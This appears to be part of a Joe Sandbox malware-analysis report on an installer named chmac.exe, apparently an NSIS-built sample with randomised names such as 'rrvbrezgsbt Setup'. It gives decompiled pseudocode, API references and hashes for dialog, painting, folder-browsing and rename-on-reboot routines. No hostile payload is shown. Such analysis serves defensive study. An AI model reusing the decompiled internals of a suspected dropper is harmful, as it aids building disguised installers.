							_v8 = 0x422e40;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422e40
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423ea8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423ea8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420478 != 0) {
						goto L25;
					} else {
						_t103 =  *0x41fc68; // 0x0
						_t25 = _t103 + 0x14; // 0x14
						_t112 = _t25;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403E59(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E0040420A();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42367c; // 0x81623d
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_t71 =  *0x423ed8; // 0x814930
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 + _t71;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403F4B;
				E00403E37(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403E37(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403E59( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403E6C(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t85 =  *0x423eb0; // 0x80f8a0
				_t20 = _t85 + 0x68; // 0xfffffff1
				_t86 =  *_t20;
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f45c =  *0x41f45c & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420478 =  *0x420478 & 0x00000000;
				return 0;
			}

0x00403f8f
0x004040b5
0x00404111
0x00404115
0x004041ec
0x004041ee
0x004041ee
0x004041f4
0x004041f4
0x004041f7
0x00000000
0x004041fe
0x00404123
0x00404125
0x0040412f
0x0040413a
0x0040413d
0x00404140
0x0040414b
0x0040414e
0x00404155
0x00404163
0x0040417b
0x00404183
0x0040418e
0x0040419e
0x004041a0
0x004041a0
0x00404155
0x004041aa
0x00000000
0x004041b5
0x004041b9
0x004041ca
0x004041ca
0x004041d0
0x004041de
0x004041de
0x00000000
0x004041e2
0x004041aa
0x004040c0
0x00000000
0x004040d4
0x004040d4
0x004040da
0x004040da
0x004040e0
0x00000000
0x00000000
0x00404105
0x00404107
0x0040410c
0x00000000
0x0040410c
0x004040c0
0x00403f95
0x00403f98
0x00403f9d
0x00403f9f
0x00403fae
0x00403fae
0x00403fb0
0x00403fb5
0x00403fb8
0x00403fba
0x00403fbf
0x00403fc8
0x00403fce
0x00403fda
0x00403fdd
0x00403fe6
0x00403feb
0x00403fee
0x00403ff3
0x0040400a
0x00404011
0x00404024
0x00404027
0x0040403c
0x0040403e
0x00404043
0x00404043
0x00404048
0x0040404d
0x0040404d
0x0040405c
0x0040406b
0x0040406d
0x00404083
0x00404092
0x00404094
0x00000000

APIs

CheckDlgButton.USER32 ref: 0040400A
GetDlgItem.USER32 ref: 0040401E
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040403C
GetSysColor.USER32(FFFFFFF1), ref: 0040404D
SendMessageA.USER32(00000000,00000443,00000000,FFFFFFF1), ref: 0040405C
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040406B
lstrlenA.KERNEL32(?), ref: 00404075
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404083
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404092
GetDlgItem.USER32 ref: 004040F5
SendMessageA.USER32(00000000), ref: 004040F8
GetDlgItem.USER32 ref: 00404123
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404163
LoadCursorA.USER32 ref: 00404172
SetCursor.USER32(00000000), ref: 0040417B
ShellExecuteA.SHELL32(0000070B,open,@.B,00000000,00000000,00000001), ref: 0040418E
LoadCursorA.USER32 ref: 0040419B
SetCursor.USER32(00000000), ref: 0040419E
SendMessageA.USER32(00000111,00000001,00000000), ref: 004041CA
SendMessageA.USER32(00000010,00000000,00000000), ref: 004041DE

Strings

@.B, xrefs: 00404183
N, xrefs: 00404111
open, xrefs: 00404186

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: @.B$N$open
API String ID: 3615053054-3815657624
Opcode ID: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
Instruction ID: c3de460066171d4a99b3db8707b5a70307f179c1ca483427b8a670d92431fbf8
Opcode Fuzzy Hash: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
Instruction Fuzzy Hash: 4E61C3B1A40209BFEB109F60CC45B6A7B69FB54715F108136FB04BA2D1C7B8A951CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423eb0; // 0x80f8a0
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						_t36 = _t130 + 0x54; // 0xffffffff
						_t38 = _t130 + 0x50; // 0xffffffff
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *_t38 & 0x000000ff) * _a12 + ( *_t36 & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t56 = _t130 + 0x34; // 0x80f8a0
						_t94 = CreateFontIndirectA( *_t56);
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							_t61 = _t130 + 0x58; // 0xffffffff
							SetTextColor(_t128,  *_t61);
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "rrvbrezgsbt Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x423ea8; // 0x0
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010a9
0x004010b3
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401102
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x0040112c
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x00401019
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(0080F8A0), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,FFFFFFFF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,rrvbrezgsbt Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C
rrvbrezgsbt Setup, xrefs: 00401150

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F$rrvbrezgsbt Setup
API String ID: 941294808-3725798446
Opcode ID: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
Instruction ID: 81477e3a2fde3fb3f26aa953fc06e347994717d76cab2c79682594c458f31f57
Opcode Fuzzy Hash: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
Instruction Fuzzy Hash: 8141BC71804249AFCB058FA4CD459BFBFB9FF44314F00802AF551AA1A0C378EA54DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 004057D3, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004057D3() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				intOrPtr _t18;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405DA3(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423f30 =  *0x423f30 + 1;
						return _t20;
					}
				}
				 *0x422628 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a0, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421ca0, "%s=%s\r\n", 0x422628, 0x4220a0);
						_t18 =  *0x423eb0; // 0x80f8a0
						_t56 = _t55 + 0x10;
						_t4 = _t18 + 0x128; // 0x18f3
						E00405AA7(_t43, 0x400, 0x4220a0, 0x4220a0,  *_t4);
						_t20 = E0040575C(0x4220a0, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E004056D1(_t51, "[Rename]\r\n") != 0) {
								_t28 = E004056D1(_t26 + 0xa, 0x409348);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E0040571D(_t51 + _t29, 0x421ca0, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405A85(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040575C(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x422628, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}

0x004057d9
0x004057e0
0x004057e4
0x004057ed
0x004057f1
0x00405930
0x00405930
0x00000000
0x00405930
0x004057f1
0x004057fd
0x00405813
0x0040583b
0x00405846
0x0040584a
0x0040586a
0x0040586c
0x00405871
0x00405874
0x0040587b
0x00405888
0x0040588d
0x00405892
0x00405896
0x00000000
0x00000000
0x004058a5
0x004058a7
0x004058b4
0x004058b8
0x00405929
0x0040592a
0x00000000
0x004058d4
0x004058e1
0x00405946
0x0040594d
0x004058f4
0x004058f4
0x004058f6
0x004058ff
0x0040590a
0x0040591c
0x00405923
0x00000000
0x00405923
0x0040594f
0x00405950
0x00405955
0x00405957
0x00405964
0x00405964
0x00405968
0x00000000
0x00000000
0x00000000
0x00000000
0x00405959
0x00405959
0x0040595c
0x0040595f
0x00405960
0x00000000
0x00405959
0x004058ec
0x004058f1
0x00000000
0x004058f1
0x004058b8
0x00405815
0x00405820
0x00405829
0x0040582d
0x00000000
0x00000000
0x0040582d
0x0040593a

APIs

Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1

CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,00405568,?,00000000,000000F1,?), ref: 00405820
GetShortPathNameA.KERNEL32 ref: 00405829
GetShortPathNameA.KERNEL32 ref: 00405846
wsprintfA.USER32 ref: 00405864
GetFileSize.KERNEL32(00000000,00000000,004220A0,C0000000,00000004,004220A0,000018F3,?,?,00000000,000000F1,?), ref: 0040589F
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004058AE
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004058C4
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA0,00000000,-0000000A,00409348,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040590A
WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 0040591C
GlobalFree.KERNEL32 ref: 00405923
CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 0040592A

Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708

Strings

[Rename], xrefs: 004058D4, 004058E6
(&B, xrefs: 0040580E
%s=%s, xrefs: 0040585A

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
String ID: %s=%s$(&B$[Rename]
API String ID: 3772915668-1834469719
Opcode ID: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
Instruction ID: f113039d6a8e0b98787bbcb52898fefdd985450d1919188b96c4478b1d7dfea3
Opcode Fuzzy Hash: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
Instruction Fuzzy Hash: 0F412371A00B11FBD3216B619D48FAB3A5CDB45764F100036FA05F22D2E678A801CEBD

Uniqueness

Uniqueness Score: -1.00%

Function 00404275, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 266
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404275(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t81;
				long _t86;
				signed char* _t88;
				void* _t94;
				signed int _t95;
				signed short _t113;
				signed int _t117;
				char* _t122;
				intOrPtr _t124;
				intOrPtr* _t138;
				signed int* _t145;
				intOrPtr _t147;
				signed int _t148;
				signed int _t153;
				struct HWND__* _t159;
				CHAR* _t162;
				int _t163;

				_t81 =  *0x41fc68; // 0x0
				_v36 = _t81;
				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
				_v8 =  *((intOrPtr*)(_t81 + 0x38));
				if(_a8 == 0x40b) {
					E0040532A(0x3fb, _t162);
					E00405CE3(_t162);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040532A(0x3fb, _t162);
							if(E00405659(_t180, _t162) == 0) {
								_v8 = 1;
							}
							E00405A85(0x41f460, _t162);
							_t145 = 0;
							_t86 = E00405DA3(0);
							_v16 = _t86;
							if(_t86 == 0) {
								L31:
								E00405A85(0x41f460, _t162);
								_t88 = E0040560C(0x41f460);
								if(_t88 != _t145) {
									 *_t88 =  *_t88 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f460,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L37;
								} else {
									_t163 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L38;
								}
							} else {
								if(0 == 0x41f460) {
									L30:
									_t145 = 0;
									goto L31;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t113 = _v16(0x41f460,  &_v44,  &_v24,  &_v32);
									if(_t113 != 0) {
										break;
									}
									if(_t145 != 0) {
										 *_t145 =  *_t145 & _t113;
									}
									_t145 = E004055BF(0x41f460) - 1;
									 *_t145 = 0x5c;
									if(_t145 != 0x41f460) {
										continue;
									} else {
										goto L30;
									}
								}
								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
								_v12 = 1;
								_t145 = 0;
								L37:
								_t163 = 0x400;
								L38:
								_t94 = E004046C5(5);
								if(_v12 != _t145 && _t153 < _t94) {
									_v8 = 2;
								}
								_t147 =  *0x42367c; // 0x81623d
								if( *((intOrPtr*)(_t147 + 0x10)) != _t145) {
									E00404610(0x3ff, 0xfffffffb, _t94);
									if(_v12 == _t145) {
										SetDlgItemTextA(_a4, _t163, 0x41f450);
									} else {
										E00404610(_t163, 0xfffffffc, _t153);
									}
								}
								_t95 = _v8;
								 *0x423f44 = _t95;
								if(_t95 == _t145) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t163) != 0) {
									_v8 = _t145;
								}
								E00403E59(0 | _v8 == _t145);
								if(_v8 == _t145 &&  *0x420484 == _t145) {
									E0040420A();
								}
								 *0x420484 = _t145;
								goto L53;
							}
						}
						_t180 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t117 = _a12 & 0x0000ffff;
					if(_t117 != 0x3fb) {
						L12:
						if(_t117 == 0x3e9) {
							_t148 = 7;
							memset( &_v72, 0, _t148 << 2);
							_v76 = _a4;
							_v68 = 0x420498;
							_v56 = E004045AA;
							_v52 = _t162;
							_v64 = E00405AA7(0x3fb, 0x420498, _t162, 0x41f868, _v8);
							_t122 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405578(_t162);
								_t124 =  *0x423eb0; // 0x80f8a0
								_t31 = _t124 + 0x11c; // 0x0
								_t125 =  *_t31;
								if( *_t31 != 0 && _t162 == "C:\\Users\\hardz\\AppData\\Local\\Temp") {
									E00405AA7(0x3fb, 0x420498, _t162, 0, _t125);
									if(lstrcmpiA(0x422e40, 0x420498) != 0) {
										lstrcatA(_t162, 0x422e40);
									}
								}
								 *0x420484 =  &(( *0x420484)[0]);
								SetDlgItemTextA(_a4, 0x3fb, _t162);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = _a4;
					_v12 = GetDlgItem(_t159, 0x3fb);
					if(E004055E5(_t162) != 0 && E0040560C(_t162) == 0) {
						E00405578(_t162);
					}
					 *0x423678 = _t159;
					SetWindowTextA(_v12, _t162);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403E37(_t159);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403E37(_t159);
					E00403E6C(_v12);
					_t138 = E00405DA3(7);
					if(_t138 == 0) {
						L53:
						return E00403E9E(_a8, _a12, _a16);
					}
					 *_t138(_v12, 1);
					goto L8;
				}
			}

0x0040427b
0x00404282
0x0040428e
0x0040429c
0x004042a4
0x004042a8
0x004042ae
0x004042ae
0x004042ba
0x0040432e
0x00404335
0x0040440a
0x00404411
0x00404420
0x00404420
0x00404424
0x0040442a
0x00404437
0x00404439
0x00404439
0x00404447
0x0040444c
0x0040444f
0x00404456
0x00404459
0x00404490
0x00404492
0x00404498
0x0040449f
0x004044a1
0x004044a1
0x004044bd
0x004044f9
0x00000000
0x004044bf
0x004044c2
0x004044d6
0x004044d8
0x00000000
0x004044d8
0x0040445b
0x0040445f
0x0040448e
0x0040448e
0x00000000
0x00000000
0x00000000
0x00000000
0x00404461
0x00404461
0x0040446e
0x00404473
0x00000000
0x00000000
0x00404477
0x00404479
0x00404479
0x00404484
0x00404487
0x0040448c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040448c
0x004044e7
0x004044ee
0x004044f5
0x004044fc
0x004044fc
0x00404501
0x00404503
0x0040450b
0x00404511
0x00404511
0x00404518
0x00404521
0x0040452b
0x00404533
0x00404549
0x00404535
0x00404539
0x00404539
0x00404533
0x0040454e
0x00404553
0x00404558
0x00404561
0x00404561
0x0040456a
0x0040456c
0x0040456c
0x00404578
0x00404580
0x0040458a
0x0040458a
0x0040458f
0x00000000
0x0040458f
0x00404459
0x00404413
0x0040441a
0x00000000
0x00000000
0x00000000
0x0040441a
0x0040433b
0x00404341
0x0040435b
0x00404360
0x0040436a
0x00404371
0x00404380
0x00404383
0x00404386
0x0040438d
0x00404395
0x00404398
0x0040439c
0x004043a3
0x004043ab
0x00404403
0x004043ad
0x004043ae
0x004043b5
0x004043ba
0x004043bf
0x004043bf
0x004043c7
0x004043d4
0x004043e8
0x004043ec
0x004043ec
0x004043e8
0x004043f1
0x004043fc
0x004043fc
0x004043ab
0x00000000
0x00404360
0x0040434e
0x00000000
0x00000000
0x00404354
0x00000000
0x004042bc
0x004042bc
0x004042c8
0x004042d2
0x004042df
0x004042df
0x004042e5
0x004042ee
0x004042f7
0x004042fa
0x004042fd
0x00404305
0x00404308
0x0040430b
0x00404313
0x0040431a
0x00404321
0x00404595
0x004045a7
0x004045a7
0x0040432c
0x00000000
0x0040432c

APIs

GetDlgItem.USER32 ref: 004042C1
SetWindowTextA.USER32(?,?), ref: 004042EE
SHBrowseForFolderA.SHELL32(?,0041F868,?), ref: 004043A3
CoTaskMemFree.OLE32(00000000), ref: 004043AE
lstrcmpiA.KERNEL32(pzusn,00420498,00000000,00000000,?), ref: 004043E0
lstrcatA.KERNEL32(?,pzusn), ref: 004043EC
SetDlgItemTextA.USER32 ref: 004043FC

Part of subcall function 0040532A: GetDlgItemTextA.USER32 ref: 0040533D

Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D

GetDiskFreeSpaceA.KERNEL32(0041F460,?,?,0000040F,?,0041F460,0041F460,?,00000000,0041F460,?,?,000003FB,?), ref: 004044B5
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004044D0
SetDlgItemTextA.USER32 ref: 00404549

Strings

A, xrefs: 0040439C
C:\Users\user\AppData\Local\Temp, xrefs: 004043C9
pzusn, xrefs: 004043DA, 004043DF, 004043EA

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
